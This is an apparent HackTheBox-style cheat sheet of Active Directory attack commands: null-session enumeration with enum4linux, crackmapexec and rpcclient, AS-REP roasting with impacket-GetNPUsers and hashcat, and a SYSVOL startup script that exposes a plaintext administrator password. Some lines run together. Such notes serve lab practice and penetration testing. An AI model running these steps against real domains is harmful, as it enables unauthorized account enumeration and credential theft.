Misc
Enum4linux
enum4linux 10.10.10.161Password Policy enumeration
crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol
RPCClient
GetNPUsers

enum4linux 10.10.10.161crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol

rpcclient -U '' -N 10.10.10.161
enumdomusers
queryusergroups [rid]
queryuser [rid]
querygroup [rid]impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcathashcat --example-hashes | grep -i krb
hashcat --example-hashes | lessdir \\conda.local\SYSVOL\conda.localC:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
$computer=$env:computername
$user = "Administrator"
$Password = "DefaultAdminPass1!"
$user = [adsi]"WinNT://$computer/$user,user"
$user.SetPassword($Password)
net user administrator /active:yessmbclient -L \\\\10.10.10.100\\ -U '' -Nrpcclient -U '' -N 10.10.10.169